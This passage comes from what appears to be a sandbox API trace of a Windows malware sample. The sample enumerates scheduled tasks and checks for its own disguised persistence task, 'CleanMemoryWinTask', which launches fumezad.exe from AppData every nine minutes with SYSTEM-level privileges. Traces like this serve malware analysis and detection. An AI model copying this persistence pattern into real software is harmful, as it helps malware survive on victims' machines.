disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n") returned 0x0 [0226.991] StrStrIW (lpFirst="\r\n\r\n \r\n Adobe Systems Incorporated\r\n This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.\r\n \r\n \r\n \r\n true\r\n \r\n PT3600S\r\n PT86400S\r\n false\r\n \r\n 2000-01-01T00:59:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n false\r\n PT259200S\r\n false\r\n false\r\n false\r\n true\r\n false\r\n 9\r\n \r\n PT600S\r\n PT3600S\r\n true\r\n false\r\n \r\n \r\n \r\n \r\n System\r\n InteractiveTokenOrPassword\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n C:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashPlayerUpdateService.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.020] IUnknown:Release (This=0x296ab0) returned 0x0 [0227.020] IRegisteredTaskCollection:get_Item (in: This=0x2969b0, index=0x12e380*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x12e330 | out: ppRegisteredTask=0x12e330*=0x296ab0) returned 0x0 [0227.021] IRegisteredTask:get_Name (in: This=0x296ab0, pName=0x12e350 | out: pName=0x12e350*="CleanMemoryWinTask") returned 0x0 [0227.021] IRegisteredTask:get_Xml (in: This=0x296ab0, pXml=0x12e338 | out: pXml=0x12e338*="\r\n\r\n \r\n 1.0.0\r\n AuthorName\r\n Clean memory Windows task\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT9M\r\n P415DT14H23M\r\n false\r\n \r\n 2019-02-06T16:43:32\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n") returned 0x0 [0227.025] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0.0\r\n AuthorName\r\n Clean memory Windows task\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT9M\r\n P415DT14H23M\r\n false\r\n \r\n 2019-02-06T16:43:32\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n" [0227.050] lstrcmpW (lpString1="CleanMemoryWinTask", lpString2="CleanMemoryWinTask") returned 0 [0227.050] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0.0\r\n AuthorName\r\n Clean memory Windows task\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT9M\r\n P415DT14H23M\r\n false\r\n \r\n 2019-02-06T16:43:32\r\n true\r\n \r\n \r\n \r\n \r\n HighestAvailable\r\n SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n", lpSrch="SYSTEM") returned="SYSTEM\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n \r\n \r\n \r\n C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\r\n \r\n \r\n" [0227.062] IUnknown:Release (This=0x296ab0) returned 0x0 [0227.062] IRegisteredTaskCollection:get_Item (in: This=0x2969b0, index=0x12e380*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000003, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x12e330 | out: ppRegisteredTask=0x12e330*=0x296ab0) returned 0x0 [0227.062] IRegisteredTask:get_Name (in: This=0x296ab0, pName=0x12e350 | out: pName=0x12e350*="GoogleUpdateTaskMachineCore") returned 0x0 [0227.062] IRegisteredTask:get_Xml (in: This=0x296ab0, pXml=0x12e338 | out: pXml=0x12e338*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0227.064] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0227.089] IUnknown:Release (This=0x296ab0) returned 0x0 [0227.089] IRegisteredTaskCollection:get_Item (in: This=0x2969b0, index=0x12e380*(varType=0x3, wReserved1=0xffff, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000004, varVal2=0xfffffffffffffffe), ppRegisteredTask=0x12e330 | out: ppRegisteredTask=0x12e330*=0x296ab0) returned 0x0 [0227.089] IRegisteredTask:get_Name (in: This=0x296ab0, pName=0x12e350 | out: pName=0x12e350*="GoogleUpdateTaskMachineUA") returned 0x0 [0227.089] IRegisteredTask:get_Xml (in: This=0x296ab0, pXml=0x12e338 | out: 